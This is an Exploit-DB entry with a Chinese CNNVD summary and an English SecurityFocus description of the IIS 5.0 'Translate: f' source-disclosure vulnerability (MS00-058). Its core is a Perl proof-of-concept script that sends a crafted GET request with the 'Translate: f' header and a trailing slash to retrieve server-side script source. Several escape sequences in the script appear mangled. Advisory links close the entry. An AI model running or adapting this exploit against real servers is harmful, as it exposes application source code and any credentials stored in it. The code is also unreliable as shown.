https://www.exploit-db.com/exploits/20152
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200010-019

IIS是Microsoft公司开发的流行的HTTP服务器程序，随同Windows操作系统捆绑发布。IIS5.0在处理某些带有特殊标记的HTTP请求时存在漏洞，远程攻击者可能利用此漏洞得到服务器上脚本的源码。如果IIS5.0接收到一个包含特殊头格式(Translate:f)的HTTP请求，同时URL末尾包含一个特殊字符(“/”)的话，IIS会错误得调用脚本处理引擎，可能导致文件源码泄漏给远程用户。

source: http://www.securityfocus.com/bid/1578/info
 
Microsoft IIS 5.0 has a dedicated scripting engine for advanced file types such as ASP, ASA, HTR, etc. files. The scripting engines handle requests for these file types, processes them accordingly, and then executes them on the server.
 
It is possible to force the server to send back the source of known scriptable files to the client if the HTTP GET request contains a specialized header with 'Translate: f' at the end of it, and if a trailing slash '/' is appended to the end of the URL. The scripting engine will be able to locate the requested file, however, it will not recognize it as a file that needs to be processed and will proceed to send the file source to the client.


#!/usr/bin/perl
use Socket;

####test arguments
if ($#ARGV != 2) {die "usage: DNS_name/IP file_to_get portn";}
#####load values
$host = @ARGV[0];$port = @ARGV[2];$target = inet_aton($host);$toget= @ARGV[1];
#####build request
$xtosend=<<EOT
GET /$toget\ HTTP/1.0
Host: $host
User-Agent: SensePostData
Content-Type: application/x-www-form-urlencoded
Translate: f

EOT
;
$xtosend=~s/n/rn/g;
####send request
#print $xtosend;
my @results=sendraw($xtosend);
print  @results;
#### Sendraw - thanx RFP [email protected]
sub sendraw {   # this saves the whole transaction anyway
        my ($pstr)=@_;
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problemsn");
        if(connect(S,pack "SnA4x8",2,$port,$target)){
                my @in;
                select(S);      $|=1;   print $pstr;
                while(<S>){ push @in, $_;
                        print STDOUT "." if(defined $args{X});}
                select(STDOUT); close(S); return @in;
        } else { die("Can't connect...n"); }
}

来源:BUGTRAQ
名称:20000815Translate:fsummary,historyandthoughts
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg;[email protected]
来源:MS
名称:MS00-058
链接:http://www.microsoft.com/technet/security/bulletin/MS00-058.asp
来源:BID
名称:1578
链接:http://www.securityfocus.com/bid/1578
来源:NTBUGTRAQ
名称:20000816Translate:f
链接:http://www.ntbugtraq.com/default.asp?pid=36&sid;=1&A2;=ind0008&L;=ntbugtraq&F;=&S;=&P;=5212
来源:USGovernmentResource:oval:org.mitre.oval:def:927
名称:oval:org.mitre.oval:def:927
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:927
来源：NSFOCUS
名称：752
链接：http://www.nsfocus.net/vulndb/752